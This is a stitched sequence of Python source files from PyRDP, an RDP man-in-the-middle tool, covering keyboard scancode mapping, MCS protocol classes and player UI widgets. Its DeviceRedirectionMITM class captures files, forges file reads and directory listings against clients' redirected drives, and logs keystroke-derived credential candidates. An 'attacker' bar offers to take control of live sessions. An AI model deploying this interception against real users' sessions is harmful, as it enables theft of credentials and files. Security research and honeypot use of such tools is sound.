    Qt.Key.Key_Down: 0x50,
    Qt.Key.Key_PageDown: 0x51,
    Qt.Key.Key_Insert: 0x52,
    Qt.Key.Key_Delete: 0x53,
    Qt.Key.Key_SysReq: 0x54,
    Qt.Key.Key_F11: 0x57,
    Qt.Key.Key_F12: 0x58,
    Qt.Key.Key_Meta: 0x5B,
    Qt.Key.Key_Menu: 0x5D,
    Qt.Key.Key_Sleep: 0x5F,
    Qt.Key.Key_Zoom: 0x62,
    Qt.Key.Key_Help: 0x63,
    Qt.Key.Key_F13: 0x64,
    Qt.Key.Key_F14: 0x65,
    Qt.Key.Key_F15: 0x66,
    Qt.Key.Key_F16: 0x67,
    Qt.Key.Key_F17: 0x68,
    Qt.Key.Key_F18: 0x69,
    Qt.Key.Key_F19: 0x6A,
    Qt.Key.Key_F20: 0x6B,
    Qt.Key.Key_F21: 0x6C,
    Qt.Key.Key_F22: 0x6D,
    Qt.Key.Key_F23: 0x6E,
    Qt.Key.Key_F24: 0x6F,
    Qt.Key.Key_Hiragana: 0x70,
    Qt.Key.Key_Kanji: 0x71,
    Qt.Key.Key_Hangul: 0x72,
}

SCANCODE_MAPPING_NUMPAD = {
    Qt.Key.Key_Enter: 0x1C,
    Qt.Key.Key_Slash: 0x35,
    Qt.Key.Key_Asterisk: 0x37,
    Qt.Key.Key_7: 0x47,
    Qt.Key.Key_8: 0x48,
    Qt.Key.Key_9: 0x49,
    Qt.Key.Key_Minus: 0x4A,
    Qt.Key.Key_4: 0x4B,
    Qt.Key.Key_5: 0x4C,
    Qt.Key.Key_6: 0x4D,
    Qt.Key.Key_Plus: 0x4E,
    Qt.Key.Key_1: 0x4F,
    Qt.Key.Key_2: 0x50,
    Qt.Key.Key_3: 0x51,
    Qt.Key.Key_0: 0x52,
    Qt.Key.Key_Period: 0x53,
    Qt.Key.Key_Meta: 0x5C,
}

EXTENDED_KEYS = [
    Qt.Key.Key_Meta,
    Qt.Key.Key_AltGr,
    Qt.Key.Key_PageUp,
    Qt.Key.Key_PageDown,
    Qt.Key.Key_Insert,
    Qt.Key.Key_Delete,
    Qt.Key.Key_Home,
    Qt.Key.Key_End,
    Qt.Key.Key_Print,
    Qt.Key.Key_Left,
    Qt.Key.Key_Right,
    Qt.Key.Key_Up,
    Qt.Key.Key_Down,
    Qt.Key.Key_Menu,
]


def findScanCodeForEvent(event: QKeyEvent) -> Optional[int]:
    if event.modifiers() & Qt.KeypadModifier != 0:
        mapping = SCANCODE_MAPPING_NUMPAD
    else:
        mapping = SCANCODE_MAPPING

    key = event.key()
    return mapping.get(key, None)


def findKeyForScanCode(scanCode: int) -> Optional[Qt.Key]:
    # Right shift
    if scanCode == 0x36:
        return Qt.Key.Key_Shift

    # Right Windows
    elif scanCode == 0x5c:
        return Qt.Key.Key_Meta

    for mapping in [SCANCODE_MAPPING, SCANCODE_MAPPING_NUMPAD]:
        for k, v in mapping.items():
            if v == scanCode and k not in EXTENDED_KEYS:
                return k

    return None


def getKeyName(scanCode: int, isExtended: bool, shiftPressed: bool, capsLockOn: bool) -> str:

    if not isExtended:
        key = findKeyForScanCode(scanCode)
    elif scanCode == SCANCODE_MAPPING[Qt.Key.Key_Control]:
        key = Qt.Key.Key_Control
    # Numpad slash
    elif scanCode == 0x35:
        key = Qt.Key.Key_Slash
    else:
        key = None

        for extendedKey in EXTENDED_KEYS:
            if extendedKey in SCANCODE_MAPPING and SCANCODE_MAPPING[extendedKey] == scanCode:
                key = extendedKey
                break
            elif extendedKey in SCANCODE_MAPPING_NUMPAD and SCANCODE_MAPPING_NUMPAD[extendedKey] == scanCode:
                key = extendedKey
                break

        if key is None:
            return f"Unknown scan code {hex(scanCode)}"

    if key < 0x1000000:
        name = chr(key)

        if name.isalpha():
            return name.upper() if shiftPressed or capsLockOn else name.lower()
        else:
            key = shiftKey(key) if shiftPressed else key
            return chr(key)

    elif key == Qt.Key.Key_Meta:
        return "Windows"

    enumName = str(key)
    return " ".join(enumName.split("_")[1 :])


def shiftKey(key: Qt.Key) -> Qt.Key:
    if key in SCANCODE_MAPPING:
        code = SCANCODE_MAPPING[key]

        for k, v in SCANCODE_MAPPING.items():
            if v == code and k != key:
                return k

    return key


def isRightControl(event: QKeyEvent) -> bool:
    return event.key() == Qt.Key.Key_Control and event.nativeScanCode() > 50



#
# This file is part of the PyRDP project.
# Copyright (C) 2018 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from pyrdp.enum import MCSPDUType
from pyrdp.pdu.pdu import PDU


class MCSPDU(PDU):
    """
    Base class for MCS (T.125) PDUs (not actually a PDU). Every MCS PDU has a PDU type (header) and a payload.
    """
    def __init__(self, pduType: MCSPDUType, payload: bytes):
        PDU.__init__(self, payload)
        self.header = pduType


class MCSConnectInitialPDU(MCSPDU):
    def __init__(self, callingDomain, calledDomain, upward, targetParams, minParams, maxParams, payload):
        MCSPDU.__init__(self, MCSPDUType.CONNECT_INITIAL, payload)
        self.callingDomain = callingDomain
        self.calledDomain = calledDomain
        self.upward = upward
        self.targetParams = targetParams
        self.minParams = minParams
        self.maxParams = maxParams


class MCSConnectResponsePDU(MCSPDU):
    def __init__(self, result, calledConnectID, domainParams, payload):
        MCSPDU.__init__(self, MCSPDUType.CONNECT_RESPONSE, payload)
        self.result = result
        self.calledConnectID = calledConnectID
        self.domainParams = domainParams


class MCSErectDomainRequestPDU(MCSPDU):
    def __init__(self, subHeight, subInterval, payload):
        MCSPDU.__init__(self, MCSPDUType.ERECT_DOMAIN_REQUEST, payload)
        self.subHeight = subHeight
        self.subInterval = subInterval


class MCSDisconnectProviderUltimatumPDU(MCSPDU):
    def __init__(self, reason):
        MCSPDU.__init__(self, MCSPDUType.DISCONNECT_PROVIDER_ULTIMATUM, b"")
        self.reason = reason


class MCSAttachUserRequestPDU(MCSPDU):
    def __init__(self):
        MCSPDU.__init__(self, MCSPDUType.ATTACH_USER_REQUEST, b"")


class MCSAttachUserConfirmPDU(MCSPDU):
    def __init__(self, result, initiator = None):
        MCSPDU.__init__(self, MCSPDUType.ATTACH_USER_CONFIRM, b"")
        self.result = result
        self.initiator = initiator


class MCSChannelJoinRequestPDU(MCSPDU):
    def __init__(self, initiator, channelID, payload):
        MCSPDU.__init__(self, MCSPDUType.CHANNEL_JOIN_REQUEST, payload)
        self.initiator = initiator
        self.channelID = channelID


class MCSChannelJoinConfirmPDU(MCSPDU):
    def __init__(self, result, initiator, requested, channelID, payload):
        MCSPDU.__init__(self, MCSPDUType.CHANNEL_JOIN_CONFIRM, payload)
        self.result = result
        self.initiator = initiator
        self.requested = requested
        self.channelID = channelID


class MCSSendDataRequestPDU(MCSPDU):
    def __init__(self, initiator, channelID, priority, payload):
        MCSPDU.__init__(self, MCSPDUType.SEND_DATA_REQUEST, payload)
        self.initiator = initiator
        self.channelID = channelID
        self.priority = priority


class MCSSendDataIndicationPDU(MCSPDU):
    def __init__(self, initiator, channelID, priority, payload):
        MCSPDU.__init__(self, MCSPDUType.SEND_DATA_INDICATION, payload)
        self.initiator = initiator
        self.channelID = channelID
        self.priority = priority


class MCSDomainParams(PDU):
    def __init__(self, maxChannelIDs, maxUserIDs, maxTokenIDs, numPriorities, minThroughput, maxHeight, maxMCSPDUSize,
                 protocolVersion):
        super().__init__()
        self.maxChannelIDs = maxChannelIDs
        self.maxUserIDs = maxUserIDs
        self.maxTokenIDs = maxTokenIDs
        self.numPriorities = numPriorities
        self.minThroughput = minThroughput
        self.maxHeight = maxHeight
        self.maxMCSPDUSize = maxMCSPDUSize
        self.protocolVersion = protocolVersion

    @staticmethod
    def createTarget(maxChannelIDs, maxUserIDs):
        return MCSDomainParams(maxChannelIDs, maxUserIDs, 0, 1, 0, 1, 65535, 2)

    @staticmethod
    def createMinimum():
        return MCSDomainParams(1, 1, 1, 1, 0, 1, 1056, 2)

    @staticmethod
    def createMaximum():
        return MCSDomainParams(65535, 64535, 65535, 1, 0, 1, 65535, 2)


#
# This file is part of the PyRDP project.
# Copyright (C) 2019, 2023 GoSecure Inc.
# Licensed under the GPLv3 or later.
#
from typing import Dict

from PySide6.QtCore import QObject
from PySide6.QtGui import QIcon
from PySide6.QtWidgets import QFileIconProvider, QListWidgetItem

from pyrdp.player.filesystem import FileSystemItemType


class FileSystemItem(QListWidgetItem):
    _iconCache: Dict[QFileIconProvider.IconType, QIcon] = {}

    def __init__(self, name: str, itemType: FileSystemItemType, parent: QObject = None):
        if itemType == FileSystemItemType.Drive:
            iconType = QFileIconProvider.IconType.Drive
        elif itemType == FileSystemItemType.Directory:
            iconType = QFileIconProvider.IconType.Folder
        else:
            iconType = QFileIconProvider.IconType.File

        icon = FileSystemItem._iconCache.get(iconType, None)

        if icon is None:
            icon = QFileIconProvider().icon(iconType)
            FileSystemItem._iconCache[iconType] = icon

        super().__init__(icon, name, parent)
        self.itemType = itemType

    def isDirectory(self) -> bool:
        return self.itemType == FileSystemItemType.Directory

    def isDrive(self) -> bool:
        return self.itemType == FileSystemItemType.Drive

    def isFile(self) -> bool:
        return self.itemType == FileSystemItemType.File

    def __lt__(self, other: 'FileSystemItem'):
        if self.text() == ".." and self.isDirectory():
            return True

        if self.isDrive() != other.isDrive():
            return self.isDrive()

        if self.isDirectory() != other.isDirectory():
            return self.isDirectory()

        return self.text().upper() < other.text().upper()



#
# This file is part of the PyRDP project.
# Copyright (C) 2021 GoSecure Inc.
# Licensed under the GPLv3 or later.
#
from pyrdp.convert.utils import InetAddress


class PCAPStream:
    def __init__(self, client: InetAddress, server: InetAddress):
        self.client = client
        self.server = server

    @property
    def ips(self):
        return [self.client.ip, self.server.ip]

    def __len__(self):
        raise NotImplementedError("PCAPStream.__len__ is not implemented.")

    def __iter__(self):
        raise NotImplementedError("PCAPStream.__iter__ is not implemented.")

    @staticmethod
    def timeStampFloatToInt(timeStamp: float):
        return int(timeStamp * 1000)

    @staticmethod
    def output(data: bytes, timeStamp: float, src: InetAddress, dst: InetAddress):
        return data, PCAPStream.timeStampFloatToInt(timeStamp), src, dst



#
# This file is part of the PyRDP project.
# Copyright (C) 2019-2022 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

from logging import LoggerAdapter
from typing import Dict, Optional, Union

from pyrdp.core import ObservedBy, Observer, Subject
from pyrdp.enum import CreateOption, DeviceRedirectionPacketID, DeviceType, DirectoryAccessMask, FileAccessMask, \
    FileAttributes, \
    FileCreateDisposition, FileCreateOptions, FileShareAccess, FileSystemInformationClass, \
    MajorFunction, MinorFunction, NTSTATUS, NtStatusSeverity
from pyrdp.layer import DeviceRedirectionLayer
from pyrdp.logging.StatCounter import StatCounter, STAT
from pyrdp.mitm.FileMapping import FileMapping
from pyrdp.mitm.state import RDPMITMState
from pyrdp.mitm.TCPMITM import TCPMITM
from pyrdp.pdu import DeviceAnnounce, DeviceCloseRequestPDU, DeviceCloseResponsePDU, DeviceCreateRequestPDU, \
    DeviceCreateResponsePDU, DeviceDirectoryControlResponsePDU, DeviceIORequestPDU, DeviceIOResponsePDU, \
    DeviceListAnnounceRequest, DeviceQueryDirectoryRequestPDU, DeviceQueryDirectoryResponsePDU, DeviceReadRequestPDU, \
    DeviceReadResponsePDU, DeviceRedirectionPDU


class DeviceRedirectionMITMObserver(Observer):
    def onDeviceAnnounce(self, device: DeviceAnnounce):
        pass

    def onFileDownloadResult(self, deviceID: int, requestID: int, path: str, offset: int, data: bytes):
        pass

    def onFileDownloadComplete(self, deviceID: int, requestID: int, path: str, error: int):
        pass

    def onDirectoryListingResult(self, deviceID: int, requestID: int, fileName: str, isDirectory: bool):
        pass

    def onDirectoryListingComplete(self, deviceID: int, requestID: int):
        pass


@ObservedBy(DeviceRedirectionMITMObserver)
class DeviceRedirectionMITM(Subject):
    """
    MITM component for the device redirection channel.
    It saves files transferred over RDP to a local directory.
    """

    FORGED_COMPLETION_ID = 1000000

    def __init__(self, client: DeviceRedirectionLayer, server: DeviceRedirectionLayer, log: LoggerAdapter,
                 statCounter: StatCounter, state: RDPMITMState, tcp: TCPMITM):
        """
        :param client: device redirection layer for the client side
        :param server: device redirection layer for the server side
        :param log: logger for this component
        :param statCounter: stat counter object
        :param state: shared RDP MITM state
        :param tcp: TCP MITM component
        """
        super().__init__()

        self.client = client
        self.server = server
        self.state = state
        self.log = log
        self.statCounter = statCounter
        self.tcp = tcp
        self.mappings: Dict[(int, int), FileMapping] = {}
        self.filesystemRoot = self.config.filesystemDir / self.state.sessionID

        self.currentIORequests: Dict[(int, int), DeviceIORequestPDU] = {}
        self.forgedRequests: Dict[(int, int), DeviceRedirectionMITM.ForgedRequest] = {}

        if self.config.extractFiles:
            self.responseHandlers: Dict[MajorFunction, callable] = {
                MajorFunction.IRP_MJ_CREATE: self.handleCreateResponse,
                MajorFunction.IRP_MJ_READ: self.handleReadResponse,
                MajorFunction.IRP_MJ_CLOSE: self.handleCloseResponse,
            }
        else:
            self.responseHandlers = {}

        self.client.createObserver(
            onPDUReceived=self.onClientPDUReceived,
        )

        self.server.createObserver(
            onPDUReceived=self.onServerPDUReceived,
        )

        self.tcp.client.createObserver(
            onDisconnection=self.onDisconnection
        )

        self.tcp.server.createObserver(
            onDisconnection=self.onDisconnection
        )

    def deviceRoot(self, deviceID: int):
        return self.filesystemRoot / f"device{deviceID}"

    def createDeviceRoot(self, deviceID: int):
        path = self.deviceRoot(deviceID)
        path.mkdir(parents=True, exist_ok=True)
        return path

    @property
    def config(self):
        return self.state.config

    def onDisconnection(self, reason):
        for mapping in self.mappings.values():
            mapping.onDisconnection(reason)

    def onClientPDUReceived(self, pdu: DeviceRedirectionPDU):
        self.statCounter.increment(STAT.DEVICE_REDIRECTION, STAT.DEVICE_REDIRECTION_CLIENT)
        self.handlePDU(pdu, self.server)

    def onServerPDUReceived(self, pdu: DeviceRedirectionPDU):
        self.statCounter.increment(STAT.DEVICE_REDIRECTION, STAT.DEVICE_REDIRECTION_SERVER)
        self.handlePDU(pdu, self.client)

    def handlePDU(self, pdu: DeviceRedirectionPDU, destination: DeviceRedirectionLayer):
        """
        Handle the logic for a PDU and send the PDU to its destination.
        :param pdu: the PDU that was received
        :param destination: the destination layer
        """
        dropPDU = False

        if isinstance(pdu, DeviceIORequestPDU) and destination is self.client:
            self.handleIORequest(pdu)
        elif isinstance(pdu, DeviceIOResponsePDU) and destination is self.server:
            dropPDU = (pdu.deviceID, pdu.completionID) in self.forgedRequests
            self.handleIOResponse(pdu)

        elif isinstance(pdu, DeviceListAnnounceRequest):
            self.handleDeviceListAnnounceRequest(pdu)

        elif isinstance(pdu, DeviceRedirectionPDU):
            if pdu.packetID == DeviceRedirectionPacketID.PAKID_CORE_USER_LOGGEDON:
                self.handleClientLogin()

        if not dropPDU:
            destination.sendPDU(pdu)

    def handleIORequest(self, pdu: DeviceIORequestPDU):
        """
        Keep track of IO requests that are active.
        :param pdu: the device IO request
        """

        self.statCounter.increment(STAT.DEVICE_REDIRECTION_IOREQUEST)
        key = (pdu.deviceID, pdu.completionID)
        self.currentIORequests[key] = pdu

    def handleIOResponse(self, pdu: DeviceIOResponsePDU):
        """
        Handle an IO response, depending on what kind of request originated it.
        :param pdu: the device IO response.
        """

        self.statCounter.increment(STAT.DEVICE_REDIRECTION_IORESPONSE)
        key = (pdu.deviceID, pdu.completionID)
        if key in self.forgedRequests:
            request = self.forgedRequests[key]
            request.handleResponse(pdu)

            if request.isComplete:
                self.forgedRequests.pop(key)

        elif key in self.currentIORequests:
            requestPDU = self.currentIORequests.pop(key)

            if pdu.ioStatus >> 30 == NtStatusSeverity.STATUS_SEVERITY_ERROR:
                self.statCounter.increment(STAT.DEVICE_REDIRECTION_IOERROR)
                # log only for unexpected errors since "no such files" and "no more files" are frequent:
                # "no such files" for all attempts at fetching .desktop.ini
                # "no more files" when directory listings are finished
                if pdu.ioStatus not in [NTSTATUS.STATUS_NO_SUCH_FILE,
                                        NTSTATUS.STATUS_NO_MORE_FILES]:
                    self.log.warning("Received an IO Response with an error IO status: "
                                     "%(responsePDU)s for request %(requestPDU)s",
                                     {"responsePDU": repr(pdu), "requestPDU": repr(requestPDU)})

            if pdu.majorFunction in self.responseHandlers:
                self.responseHandlers[pdu.majorFunction](requestPDU, pdu)
            # Good place to debug
            #else:
            #    self.log.warning("No handler was triggered for this IO request: %(requestPDU)s. Response: %(responsePDU)s", {"responsePDU": repr(pdu), "requestPDU": repr(requestPDU)})

        else:
            self.log.error("Received IO response to unknown request #%(completionID)d", {"completionID": pdu.completionID})

    def handleDeviceListAnnounceRequest(self, pdu: DeviceListAnnounceRequest):
        """
        Log mapped devices.
        :param pdu: the device list announce request.
        """

        for device in pdu.deviceList:
            self.log.info("%(deviceType)s mapped with ID %(deviceID)d: %(deviceName)s", {
                "deviceType": DeviceType.getPrettyName(device.deviceType),
                "deviceID": device.deviceID,
                "deviceName": device.preferredDOSName
            })

            self.createDeviceRoot(device.deviceID)
            self.observer.onDeviceAnnounce(device)

    def handleCreateResponse(self, request: DeviceCreateRequestPDU, response: DeviceCreateResponsePDU):
        """
        Prepare to intercept a file: create a FileMapping object, which will only create the file when we actually write
        to it. When listing a directory, Windows sends a lot of create requests without actually reading the files. We
        verify the request to avoid creating a lot of empty files whenever a directory is listed.
        :param request: the device create request
        :param response: the device IO response to the request
        """
        # The following will sometimes stacktrace because request is a
        # DeviceIORequestPDU without a path attribute instead of DeviceCreateRequestPDU
        #self.log.debug("Handling a DeviceCreateRequest. Path: '%(path)s'", {"path": request.path})

        isFileRead = request.desiredAccess & (FileAccessMask.GENERIC_READ | FileAccessMask.FILE_READ_DATA) != 0
        isDirectory = request.createOptions & CreateOption.FILE_NON_DIRECTORY_FILE == 0
        fileExists = (response.ioStatus != NTSTATUS.STATUS_NO_SUCH_FILE)

        if fileExists and isFileRead and not isDirectory:
            mapping = FileMapping.generate(request.path, self.config.fileDir, self.deviceRoot(response.deviceID), self.log)
            key = (response.deviceID, response.fileID)
            self.mappings[key] = mapping

    def handleReadResponse(self, request: DeviceReadRequestPDU, response: DeviceReadResponsePDU):
        """
        Write the data that was read at the appropriate offset in the file proxy.
        :param request: the device read request
        :param response: the device IO response to the request
        """
        key = (response.deviceID, request.fileID)

        if key in self.mappings:
            mapping = self.mappings[key]
            mapping.seek(request.offset)
            mapping.write(response.payload)

    def handleCloseResponse(self, request: DeviceCloseRequestPDU, response: DeviceCloseResponsePDU):
        """
        Close the file if it was open. Compute the hash of the file, then delete it if we already have a file with the
        same hash.
        :param request: the device close request
        :param response: the device IO response to the request
        """

        self.statCounter.increment(STAT.DEVICE_REDIRECTION_FILE_CLOSE)
        key = (response.deviceID, request.fileID)

        if key in self.mappings:
            mapping = self.mappings.pop(key)
            mapping.finalize()

    def handleClientLogin(self):
        """
        Handle events that should be triggered when a client logs in.
        """

        if self.state.credentialsCandidate or self.state.inputBuffer:
            self.log.info("Credentials candidate from heuristic: %(credentials_candidate)s", {
                "credentials_candidate" : (self.state.credentialsCandidate or self.state.inputBuffer)
            })

        # Deactivate the logger for this client
        self.state.loggedIn = True
        self.state.shiftPressed = False
        self.state.capsLockOn = False
        self.state.credentialsCandidate = ""
        self.state.inputBuffer = ""

    def findNextRequestID(self) -> int:
        """
        Find the next request ID to be returned for a forged request. Request ID's start from a different base than the
        IDs for normal RDPDR requests to avoid collisions. IDs are reused after their request has completed. What we
        call a "request ID" is the equivalent of the "completion ID" in RDPDR documentation.
        """
        completionID = DeviceRedirectionMITM.FORGED_COMPLETION_ID

        while completionID in [key[1] for key in self.forgedRequests]:
            completionID += 1

        return completionID

    def sendForgedFileRead(self, deviceID: int, path: str) -> int:
        """
        Send a forged requests for reading a file. Returns a request ID that can be used by the caller to keep track of
        which file the responses belong to. Results are sent by using the DeviceRedirectionMITMObserver interface.
        :param deviceID: ID of the target device.
        :param path: path of the file to download. The path should use '\' instead of '/' to separate directories.
        """

        if not self.config.extractFiles:
            self.log.info('Ignored attempt to forge file reads because file extraction is disabled.')
            return 0

        self.statCounter.increment(STAT.DEVICE_REDIRECTION_FORGED_FILE_READ)

        completionID = self.findNextRequestID()
        request = DeviceRedirectionMITM.ForgedFileReadRequest(deviceID, completionID, self, path)
        key = (deviceID, completionID)
        self.forgedRequests[key] = request

        request.send()
        return completionID

    def sendForgedDirectoryListing(self, deviceID: int, path: str) -> int:
        r"""
        Send a forged directory listing request. Returns a request ID that can be used by the caller to keep track of which
        file belongs to which directory. Results are sent by using the DeviceRedirectionMITMObserver interface.
        :param deviceID: ID of the target device.
        :param path: path of the directory to list. The path should use '\' instead of '/' to separate directories. It
        should also contain a pattern to match. For example: to list all files in the Documents folder, the path should be
        \Documents\*
        """

        if not self.config.extractFiles:
            self.log.info('Ignored attempt to forge directory listing because file extraction is disabled.')
            return 0

        self.statCounter.increment(STAT.DEVICE_REDIRECTION_FORGED_DIRECTORY_LISTING)

        completionID = self.findNextRequestID()
        request = DeviceRedirectionMITM.ForgedDirectoryListingRequest(deviceID, completionID, self, path)
        key = (deviceID, completionID)
        self.forgedRequests[key] = request

        request.send()
        return completionID

    class ForgedRequest:
        """
        Base class for forged requests that simulate the server asking for information.
        """

        def __init__(self, deviceID: int, requestID: int, mitm: 'DeviceRedirectionMITM'):
            """
            :param deviceID: ID of the device used.
            :param requestID: this request's ID.
            :param mitm: the parent MITM.
            """

            self.deviceID = deviceID
            self.requestID = requestID
            self.mitm: 'DeviceRedirectionMITM' = mitm
            self.fileID: Optional[int] = None
            self.isComplete = False
            self.handlers: Dict[MajorFunction, callable] = {
                MajorFunction.IRP_MJ_CREATE: self.onCreateResponse,
                MajorFunction.IRP_MJ_CLOSE: self.onCloseResponse,
            }

        def send(self):
            pass

        def sendCloseRequest(self):
            request = DeviceCloseRequestPDU(
                self.deviceID,
                self.fileID,
                self.requestID,
                0
            )

            self.sendIORequest(request)

        def sendIORequest(self, request: DeviceIORequestPDU):
            self.mitm.client.sendPDU(request)

        def complete(self):
            self.isComplete = True

        def handleResponse(self, response: DeviceIOResponsePDU):
            if response.majorFunction in self.handlers:
                self.handlers[response.majorFunction](response)

        def onCreateResponse(self, response: DeviceCreateResponsePDU):
            if response.ioStatus == 0:
                self.fileID = response.fileID

        def onCloseResponse(self, _: DeviceCloseResponsePDU):
            self.complete()

    class ForgedFileReadRequest(ForgedRequest):
        def __init__(self, deviceID: int, requestID: int, mitm: 'DeviceRedirectionMITM', path: str):
            """
            :param deviceID: ID of the device used.
            :param requestID: this request's ID.
            :param mitm: the parent MITM.
            :param path: path of the file to download.
            """
            super().__init__(deviceID, requestID, mitm)
            self.path = path
            self.handlers[MajorFunction.IRP_MJ_READ] = self.onReadResponse
            self.offset = 0

        def send(self):
            # Open the file
            request = DeviceCreateRequestPDU(
                self.deviceID,
                0,
                self.requestID,
                0,
                FileAccessMask.FILE_READ_DATA,
                0,
                FileAttributes.FILE_ATTRIBUTE_NONE,
                FileShareAccess(7), # read, write, delete
                FileCreateDisposition.FILE_OPEN,
                FileCreateOptions.FILE_NON_DIRECTORY_FILE,
                self.path
            )

            self.sendIORequest(request)

        def sendReadRequest(self):
            request = DeviceReadRequestPDU(
                self.deviceID,
                self.fileID,
                self.requestID,
                0,
                1024 * 16,
                self.offset
            )

            self.sendIORequest(request)

        def onCreateResponse(self, response: DeviceCreateResponsePDU):
            super().onCreateResponse(response)

            if self.fileID is None:
                self.handleFileComplete(response.ioStatus)
                return

            self.sendReadRequest()

        def onReadResponse(self, response: DeviceReadResponsePDU):
            if response.ioStatus != 0:
                self.handleFileComplete(response.ioStatus)
                return

            length = len(response.payload)

            if length == 0:
                self.handleFileComplete(0)
                return

            self.mitm.observer.onFileDownloadResult(self.deviceID, self.requestID, self.path, self.offset, response.payload)

            self.offset += length
            self.sendReadRequest()

        def handleFileComplete(self, error: int):
            self.mitm.observer.onFileDownloadComplete(self.deviceID, self.requestID, self.path, error)

            if self.fileID is None:
                self.complete()
            else:
                self.sendCloseRequest()

    class ForgedDirectoryListingRequest(ForgedRequest):
        def __init__(self, deviceID: int, requestID: int, mitm: 'DeviceRedirectionMITM', path: str):
            """
            :param deviceID: ID of the device used.
            :param requestID: this request's ID.
            :param mitm: the parent MITM.
            :param path: path to list.
            """
            super().__init__(deviceID, requestID, mitm)
            self.path = path
            self.handlers[MajorFunction.IRP_MJ_DIRECTORY_CONTROL] = self.onDirectoryControlResponse

        def send(self):
            if "*" not in self.path:
                openPath = self.path
            else:
                openPath = self.path[: self.path.index("*")]

            if openPath.endswith("\\"):
                openPath = openPath[: -1]

            # We need to start by opening the directory.
            request = DeviceCreateRequestPDU(
                self.deviceID,
                0,
                self.requestID,
                0,
                DirectoryAccessMask.FILE_LIST_DIRECTORY,
                0,
                FileAttributes.FILE_ATTRIBUTE_DIRECTORY,
                FileShareAccess(7), # read, write, delete
                FileCreateDisposition.FILE_OPEN,
                FileCreateOptions.FILE_DIRECTORY_FILE,
                openPath
            )

            self.sendIORequest(request)

        def onCreateResponse(self, response: DeviceCreateResponsePDU):
            super().onCreateResponse(response)

            if self.fileID is None:
                self.complete()
                return

            # Now that the file is open, start listing the directory.
            request = DeviceQueryDirectoryRequestPDU(
                self.deviceID,
                self.fileID,
                self.requestID,
                FileSystemInformationClass.FileBothDirectoryInformation,
                1,
                self.path
            )

            self.sendIORequest(request)

        def onDirectoryControlResponse(self, response: Union[DeviceDirectoryControlResponsePDU, DeviceQueryDirectoryResponsePDU]):
            if response.minorFunction != MinorFunction.IRP_MN_QUERY_DIRECTORY:
                return

            if response.ioStatus == 0:
                self.handleDirectoryListingResponse(response)
            else:
                self.handleDirectoryListingComplete(response)

        def handleDirectoryListingResponse(self, response: DeviceQueryDirectoryResponsePDU):
            for info in response.fileInformation:
                try:
                    isDirectory = info.fileAttributes & FileAttributes.FILE_ATTRIBUTE_DIRECTORY != 0
                except AttributeError:
                    isDirectory = False

                self.mitm.observer.onDirectoryListingResult(self.deviceID, self.requestID, info.fileName, isDirectory)

            # Send a follow-up request to get the next file (or a nonzero ioStatus, which will complete the listing).
            pdu = DeviceQueryDirectoryRequestPDU(
                self.deviceID,
                self.fileID,
                self.requestID,
                response.informationClass,
                0,
                ""
            )

            self.sendIORequest(pdu)

        def handleDirectoryListingComplete(self, _: DeviceQueryDirectoryResponsePDU):
            self.mitm.observer.onDirectoryListingComplete(self.deviceID, self.requestID)

            # Once we're done, we can close the file.
            self.sendCloseRequest()



#
# This file is part of the PyRDP project.
# Copyright (C) 2018, 2021 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

"""
File that contains helper methods to use in the library.
"""
import logging
from logging import Logger


class FilePositionGuard:
    """
    Object that can be used in a 'with' statement that will restore a file's pointer to the position it had at
    the start of the with statement. E.g:

    # file position is 200
    with FilePositionGuard(file):
        file.read(10)
        file.tell() # file position is now 210

    file.tell() # file position is now 200 again
    """

    def __init__(self, file):
        self.file = file
        self.startingPosition = None

    def __enter__(self):
        self.startingPosition = self.file.tell()
        return self

    def __exit__(self, exc_type, exception, traceback):
        self.file.seek(self.startingPosition)


def decodeUTF16LE(data: bytes) -> str:
    """
    Decode the provided bytes in UTF-16 in a way that does not crash when invalid input is provided.
    :param data: The data to decode as utf-16.
    :return: The python string
    """
    return data.decode("utf-16le", errors="ignore")


def encodeUTF16LE(string: str) -> bytes:
    """
    Encode the provided string in UTF-16 in a way that does not crash when invalid input is provided.
    :param string: The python string to encode to bytes
    :return: The raw bytes
    """
    return string.encode("utf-16le", errors="ignore")


def getLoggerPassFilters(loggerName: str) -> Logger:
    """
    Returns a logger instance where the filters of all the parent chain are applied to it.
    This is needed since Filters do NOT get inherited from parent logger to child logger.
    See: https://docs.python.org/3/library/logging.html#filter-objects
    """
    logger = logging.getLogger(loggerName)
    subLoggerNames = loggerName.split(".")
    filterList = []
    parentLoggerName = ""
    for subLoggerName in subLoggerNames:
        parentLoggerName += subLoggerName
        parentLogger = logging.getLogger(parentLoggerName)
        filterList += parentLogger.filters
        parentLoggerName += "."
    [logger.addFilter(parentFilter) for parentFilter in filterList]
    return logger



#
# This file is part of the PyRDP project.
# Copyright (C) 2019-2023 GoSecure Inc.
# Licensed under the GPLv3 or later.
#

import logging

from PySide6.QtCore import Signal
from PySide6.QtWidgets import QHBoxLayout, QWidget, QSpacerItem, QSizePolicy

from pyrdp.logging import LOGGER_NAMES
from pyrdp.ui import PlayPauseButton


class AttackerBar(QWidget):
    """
    Bar that contains widgets for live session actions.
    """

    controlTaken = Signal()
    controlReleased = Signal()

    def __init__(self, parent: QWidget = None):
        super().__init__(parent)

        self.log = logging.getLogger(LOGGER_NAMES.PLAYER)

        self.attackButton = PlayPauseButton(playText = "Take control", pauseText = "Release control")
        self.attackButton.clicked.connect(self.onAttackButtonClicked)

        horizontal = QHBoxLayout()
        horizontal.addWidget(self.attackButton)
        horizontal.addItem(QSpacerItem(1, 1, QSizePolicy.Expanding, QSizePolicy.Minimum))

        self.setLayout(horizontal)

    def onAttackButtonClicked(self):
        if self.attackButton.playing:
            self.log.debug("Attacker has taken control")
            self.controlTaken.emit()
        else:
            self.log.debug("Attacker has released control")
            self.controlReleased.emit()



#
# This file is part of the PyRDP project.
# Copyright (C) 2021 GoSecure Inc.
# Licensed under the GPLv3 or later.
#
import math
import traceback
from pathlib import Path
from typing import Dict, List, Tuple

from progressbar import progressbar
from scapy.layers.inet import TCP
from scapy.layers.tls.record import TLS
from pyrdp.convert.pyrdp_scapy import *

from pyrdp.convert.Converter import Converter
from pyrdp.convert.ExportedPDUStream import ExportedPDUStream
from pyrdp.convert.TLSPDUStream import TLSPDUStream
from pyrdp.convert.PCAPStream import PCAPStream
from pyrdp.convert.RDPReplayer import RDPReplayer
from pyrdp.convert.utils import tcp_both, getSessionInfo, findClientRandom, createHandler, canExtractSessionInfo


class PCAPConverter(Converter):
    SESSIONID_FORMAT = "{timestamp}_{src}-{dst}"

